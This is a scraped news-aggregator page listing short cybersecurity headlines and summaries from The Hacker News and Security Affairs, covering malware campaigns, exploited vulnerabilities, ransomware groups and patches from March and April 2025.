Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to

Published: 2025-03-31T15:00:00



The Hacker News

RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. "RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that

Published: 2025-03-30T10:37:00



The Hacker News

New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials

Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey. "Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,"

Published: 2025-03-29T12:58:00



The Hacker News

BlackLock Ransomware Exposed After Researchers Exploit Leak Site Vulnerability

In what's an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract

Published: 2025-03-29T09:22:00



The Hacker News

Researchers Uncover 46 Critical Flaws in Solar Power Systems From Sungrow, Growatt, and SMA

Cybersecurity researchers have disclosed 46 new security flaws in products from three solar power system vendors, Sungrow, Growatt, and SMA, that could be exploited by a bad actor to seize control of devices or execute code remotely, posing severe risks to electrical grids.  The vulnerabilities have been collectively codenamed SUN:DOWN by Forescout Vedere Labs. "The new vulnerabilities can

Published: 2025-03-28T18:51:00



The Hacker News

CoffeeLoader Uses GPU-Based Armoury Packer to Evade EDR and Antivirus Detection

Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads. The malware, according to Zscaler ThreatLabz, shares behavioral similarities with another known malware loader known as SmokeLoader.  "The purpose of the malware is to download and execute second-stage payloads while evading

Published: 2025-03-28T17:27:00



The Hacker News

Product Walkthrough: How Datto BCDR Delivers Unstoppable Business Continuity

Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is

Published: 2025-03-28T15:45:00



The Hacker News

PJobRAT Malware Campaign Targeted Taiwanese Users via Fake Chat Apps

An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. "PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices," Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first

Published: 2025-03-28T13:36:00



The Hacker News

Nine-Year-Old npm Packages Hijacked to Exfiltrate API Keys via Obfuscated Scripts

Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems. "Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers," Sonatype researcher Ax Sharma said. "However, [...] the latest

Published: 2025-03-28T11:36:00



The Hacker News

Mozilla Patches Critical Firefox Bug Similar to Chrome’s Recent Zero-Day Vulnerability

Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day. The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape. "Following the recent Chrome sandbox escape (

Published: 2025-03-28T11:14:00



The Hacker News

New Morphing Meerkat Phishing Kit Mimics 114 Brands Using Victims’ DNS Email Records

Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind

Published: 2025-03-27T22:28:00



The Hacker News

Hackers Repurpose RansomHub's EDRKillShifter in Medusa, BianLian, and Play Attacks

A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of a custom tool that's designed to disable endpoint detection and response (EDR) software on compromised hosts, according to ESET. The EDR killing tool, dubbed EDRKillShifter, was first documented as used by RansomHub actors in

Published: 2025-03-27T19:40:00



The Hacker News

APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware

An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as

Published: 2025-03-27T18:01:00



The Hacker News

New Report Explains Why CASB Solutions Fail to Address Shadow SaaS and How to Fix It

Whether it’s CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. Organizations often rely on traditional CASB solutions for protecting against malicious access and data exfiltration, but these fall short for protecting against shadow SaaS, data damage, and more. A new report, Understanding SaaS Security Risks: Why

Published: 2025-03-27T16:55:00



The Hacker News

Top 3 MS Office Exploits Hackers Use in 2025 Stay Alert!

Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1.

Published: 2025-03-27T15:30:00



The Hacker News

150,000 Sites Compromised by JavaScript Injection Promoting Chinese Gambling Platforms

An ongoing campaign that infiltrates legitimate websites with malicious JavaScript injects to promote Chinese-language gambling platforms has ballooned to compromise approximately 150,000 sites to date. "The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor's browser," c/side security analyst Himanshu

Published: 2025-03-27T13:43:00



The Hacker News

CISA Warns of Sitecore RCE Flaws; Active Exploits Hit Next.js and DrayTek Devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two six-year-old security flaws impacting Sitecore CMS and Experience Platform (XP) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2019-9874 (CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF

Published: 2025-03-27T11:53:00



The Hacker News

NetApp SnapCenter Flaw Could Let Users Gain Remote Admin Access on Plug-In Systems

A critical security flaw has been disclosed in NetApp SnapCenter that, if successfully exploited, could allow privilege escalation. SnapCenter is an enterprise-focused software that's used to manage data protection across applications, databases, virtual machines, and file systems, offering the ability to backup, restore, and clone data resources. The vulnerability, tracked as

Published: 2025-03-27T11:36:00



The Hacker News

New SparrowDoor Backdoor Variants Found in Attacks on U.S. and Mexican Organizations

The Chinese threat actor known as FamousSparrow has been linked to a cyber attack targeting a trade group in the United States and a research institute in Mexico to deliver its flagship backdoor SparrowDoor and ShadowPad. The activity, observed in July 2024, marks the first time the hacking crew has deployed ShadowPad, a malware widely shared by Chinese state-sponsored actors. "FamousSparrow

Published: 2025-03-26T22:29:00



The Hacker News

EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware

The threat actor known as EncryptHub exploited a recently-patched security vulnerability in Microsoft Windows as a zero-day to deliver a wide range of malware families, including backdoors and information stealers such as Rhadamanthys and StealC. "In this attack, the threat actor manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payload,

Published: 2025-03-26T19:23:00



The Hacker News

RedCurl Shifts from Espionage to Ransomware with First-Ever QWCrypt Deployment

The Russian-speaking hacking group called RedCurl has been linked to a ransomware campaign for the first time, marking a departure in the threat actor's tradecraft. The activity, observed by Romanian cybersecurity company Bitdefender, involves the deployment of a never-before-seen ransomware strain dubbed QWCrypt. RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating

Published: 2025-03-26T19:13:00



The Hacker News

Malicious npm Package Modifies Local 'ethers' Library to Launch Reverse Shell Attacks

Cybersecurity researchers have discovered two malicious packages on the npm registry that are designed to infect another locally installed package, underscoring the continued evolution of software supply chain attacks targeting the open-source ecosystem. The packages in question are ethers-provider2 and ethers-providerz, with the former downloaded 73 times to date since it was published on

Published: 2025-03-26T17:30:00



The Hacker News

Sparring in the Cyber Ring: Using Automated Pentesting to Build Resilience

“A boxer derives the greatest advantage from his sparring partner ” Epictetus, 50 135 AD Hands up. Chin tucked. Knees bent. The bell rings, and both boxers meet in the center and circle. Red throws out three jabs, feints a fourth, and BANG lands a right hand on Blue down the center. This wasn’t Blue’s first day and despite his solid defense in front of the mirror, he feels the pressure.

Published: 2025-03-26T16:55:00



The Hacker News

Zero-Day Alert: Google Releases Chrome Patch for Exploit Used in Russian Espionage Attacks

Google has released out-of-band fixes to address a high-severity security flaw in its Chrome browser for Windows that has been exploited in the wild as part of attacks targeting organizations in Russia.  The vulnerability, tracked as CVE-2025-2783 (CVSS score: 8.3), has been described as a case of "incorrect handle provided in unspecified circumstances in Mojo on Windows." Mojo

Published: 2025-03-26T16:40:00



The Hacker News

How PAM Mitigates Insider Threats: Preventing Data Breaches, Privilege Misuse, and More

When people think of cybersecurity threats, they often picture external hackers breaking into networks. However, some of the most damaging breaches stem from within organizations. Whether through negligence or malicious intent, insiders can expose your organization to significant cybersecurity risks. According to Verizon's 2024 Data Breach Investigations Report, 57% of companies experience over

Published: 2025-03-26T15:45:00



The Hacker News

Hackers Using E-Crime Tool Atlantis AIO for Credential Stuffing on 140+ Platforms

Threat actors are leveraging an e-crime tool called Atlantis AIO Multi-Checker to automate credential stuffing attacks, according to findings from Abnormal Security. Atlantis AIO "has emerged as a powerful weapon in the cybercriminal arsenal, enabling attackers to test millions of stolen credentials in rapid succession," the cybersecurity company said in an analysis. Credential stuffing is a

Published: 2025-03-26T14:23:00



The Hacker News

New Security Flaws Found in VMware Tools and CrushFTP High Risk, PoC Released

Broadcom has issued security patches to address a high-severity security flaw in VMware Tools for Windows that could lead to an authentication bypass. Tracked as CVE-2025-22230, the vulnerability is rated 7.8 on the ten-point Common Vulnerability Scoring System (CVSS). "VMware Tools for Windows contains an authentication bypass vulnerability due to improper access control," Broadcom said in an

Published: 2025-03-26T09:50:00



The Hacker News

Researchers Uncover ~200 Unique C2 Domains Linked to Raspberry Robin Access Broker

A new investigation has unearthed nearly 200 unique command-and-control (C2) domains associated with a malware called Raspberry Robin. "Raspberry Robin (also known as Roshtyak or Storm-0856) is a complex and evolving threat actor that provides initial access broker (IAB) services to numerous criminal groups, many of which have connections to Russia," Silent Push said in a report shared with The

Published: 2025-03-25T19:09:00



The Hacker News

Chinese Hackers Breach Asian Telecom, Remain Undetected for Over 4 Years

A major telecommunications company located in Asia was allegedly breached by Chinese state-sponsored hackers who spent over four years inside its systems, according to a new report from incident response firm Sygnia. The cybersecurity company is tracking the activity under the name Weaver Ant, describing the threat actor as stealthy and highly persistent. The name of the telecom provider was not

Published: 2025-03-25T17:24:00



The Hacker News

AI-Powered SaaS Security: Keeping Pace with an Expanding Attack Surface

Organizations now use an average of 112 SaaS applications a number that keeps growing. In a 2024 study, 49% of 644 respondents who frequently used Microsoft 365 believed that they had less than 10 apps connected to the platform, despite the fact that aggregated data indicated over 1,000+ Microsoft 365 SaaS-to-SaaS connections on average per deployment. And that’s just one major SaaS provider.

Published: 2025-03-25T16:30:00



The Hacker News

Hackers Use .NET MAUI to Target Indian and Chinese Users with Fake Banking, Social Apps

Cybersecurity researchers are calling attention to an Android malware campaign that leverages Microsoft's .NET Multi-platform App UI (.NET MAUI) framework to create bogus banking and social media apps targeting Indian and Chinese-speaking users. "These threats disguise themselves as legitimate apps, targeting users to steal sensitive information," McAfee Labs researcher Dexter Shin said. .NET

Published: 2025-03-25T14:40:00



The Hacker News

INTERPOL Arrests 306 Suspects, Seizes 1,842 Devices in Cross-Border Cybercrime Bust

Law enforcement authorities in seven African countries have arrested 306 suspects and confiscated 1,842 devices as part of an international operation codenamed Red Card that took place between November 2024 and February 2025. The coordinated effort "aims to disrupt and dismantle cross-border criminal networks which cause significant harm to individuals and businesses," INTERPOL said, adding it

Published: 2025-03-25T12:03:00



The Hacker News

Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

A set of five critical security shortcomings have been disclosed in the Ingress NGINX Controller for Kubernetes that could result in unauthenticated remote code execution, putting over 6,500 clusters at immediate risk by exposing the component to the public internet. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, and CVE-2025-1974 ), assigned a CVSS score of

Published: 2025-03-25T00:25:00



The Hacker News

Microsoft Adds Inline Data Protection to Edge for Business to Block GenAI Data Leaks

Microsoft on Monday announced a new feature called inline data protection for its enterprise-focused Edge for Business web browser. The native data security control is designed to prevent employees from sharing sensitive company-related data into consumer generative artificial intelligence (GenAI) apps like OpenAI ChatGPT, Google Gemini, and DeepSeek. The list will be expanded over time to

Published: 2025-03-24T21:49:00



The Hacker News

VanHelsing RaaS Launch: 3 Victims, $5K Entry Fee, Multi-OS, and Double Extortion Tactics

A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025, demanding ransoms as high as $500,000. "The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%," Check Point said

Published: 2025-03-24T19:36:00



The Hacker News

THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More

A quiet tweak in a popular open-source tool opened the door to a supply chain breach what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control while hiding in plain sight. And over 300 Android apps joined the chaos, running ad fraud at scale behind

Published: 2025-03-24T17:05:00



The Hacker News

VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware

Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that's under development to its users. The extensions, named "ahban.shiba" and "ahban.cychelloworld," have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that's designed to invoke a

Published: 2025-03-24T16:40:00



The Hacker News

How to Balance Password Security Against User Experience

If given the choice, most users are likely to favor a seamless experience over complex security measures, as they don’t prioritize strong password security. However, balancing security and usability doesn’t have to be a zero-sum game. By implementing the right best practices and tools, you can strike a balance between robust password security and a frictionless user experience (UX). This article

Published: 2025-03-24T16:30:00



Security Affairs

Microsoft warns of critical flaw in Canon printer drivers

Microsoft’s offensive security team discovered a critical code execution vulnerability impacting Canon printer drivers. Researchers at Microsoft’s Offensive Research and Security Engineering (MORSE) team have discovered a critical code execution vulnerability, tracked as CVE-2025-1268 (CVSS score of 9.4), impacting Canon printer drivers. The vulnerability is an out-of-bounds issue that resides in certain printer drivers for […]

Published: 2025-04-01T18:32:12



Security Affairs

CrushFTP CVE-2025-2825 flaw actively exploited in the wild

Attackers exploit CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […]

Published: 2025-04-01T14:09:54



Security Affairs

France’s antitrust authority fines Apple 150M for issues related to its App Tracking Transparency

France fines Apple 150M for abusing its dominance in ATT consent practices on iOS and iPadOS from 2021 to 2023. France’s Autorit de la concurrence fined Apple 150M for abusing its dominance in App Tracking Transparency (ATT) consent practices on iOS and iPadOS between April 26, 2021 and July 25, 2023. Apple launched ATT with […]

Published: 2025-04-01T11:30:59



Security Affairs

Hiding WordPress malware in the mu-plugins directory to avoid detection

Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. In February, Sucuri warned of threat actors exploiting WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the plugin directory. “Unlike regular plugins, must-use plugins are automatically loaded on every page load, […]

Published: 2025-04-01T07:45:44



Security Affairs

U.S. CISA adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco Smart Licensing Utility vulnerability, tracked as CVE-2024-20439, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, […]

Published: 2025-03-31T19:56:01



Security Affairs

Russia-linked Gamaredon targets Ukraine with Remcos RAT

Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader. Talos researchers warn that Russia-linked APT group Gamaredon (a.k.a. Armageddon, Primitive Bear, ACTINIUM, Callisto) targets Ukraine with a phishing campaign. The cyberespionage group is behind a long series of spear-phishing attacks targeting Ukrainian entities, and organizations related […]

Published: 2025-03-31T13:52:32



Security Affairs

CoffeeLoader uses a GPU-based packer to evade detection

CoffeeLoader is a sophisticated malware that uses numerous techniques to bypass security solutions, Zscaler ThreatLabz warns. Zscaler ThreatLabz discovered CoffeeLoader, a malware family active since September 2024, that uses multiple techniques to evade endpoint security while downloading second-stage payloads. The advanced techniques used by the malware include GPU-based packing, call stack spoofing, sleep obfuscation, and […]

Published: 2025-03-31T13:35:30



Security Affairs

Morphing Meerkat phishing kits exploit DNS MX records

Morphing Meerkat phishing kits exploit DNS MX records to deliver spoofed login pages, targeting over 100 brands. Infoblox researchers discovered a new phishing-as-a-service (PhaaS) platform that generated multiple phishing kits, called Morphing Meerkat, using DNS mail exchange (MX) records to deliver fake login pages and targeting over 100 brands. Threat actors are exploiting DNS techniques […]

Published: 2025-03-31T08:30:57



Security Affairs

CISA warns of RESURGE malware exploiting Ivanti flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of RESURGE malware, targeting a vulnerability in Ivanti Connect Secure (ICS) appliances. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published a Malware Analysis Report (MAR) on a new malware called RESURGE. The malicious code has been used in attacks targeting the flaw CVE-2025-0282 in Ivanti Connect […]

Published: 2025-03-30T23:11:20



Security Affairs

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 39

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Microsoft Trusted Signing service abused to code-sign malware Shedding light on the ABYSSWORKER driver  VSCode Marketplace Removes Two Extensions Deploying Early-Stage Ransomware New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI   Raspberry Robin: Copy […]

Published: 2025-03-30T14:12:33








© Segmentation Fault . All rights reserved.

Privacy | Terms of Use | Contact Us